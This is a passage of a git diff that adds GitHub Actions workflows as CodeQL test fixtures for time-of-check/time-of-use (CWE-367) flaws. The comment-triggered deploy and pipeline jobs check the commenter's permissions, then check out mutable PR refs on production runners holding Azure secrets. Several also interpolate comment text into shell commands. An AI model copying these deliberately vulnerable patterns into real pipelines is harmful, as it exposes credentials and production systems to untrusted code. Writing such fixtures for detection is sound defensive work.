ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml new file mode 100644 index 00000000000..878b8377961 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml @@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml new file mode 100644 index 00000000000..6f03a0e966a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml @@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml new file mode 100644 index 00000000000..0be96a4140e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml @@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml new file mode 100644 index 00000000000..9444ad0b627 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml @@ -0,0 +1,89 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml new file mode 100644 index 00000000000..e3e557cc511 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml @@ -0,0 +1,209 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml new file mode 100644 index 00000000000..4a6d1452af2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml @@ -0,0 +1,253 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + 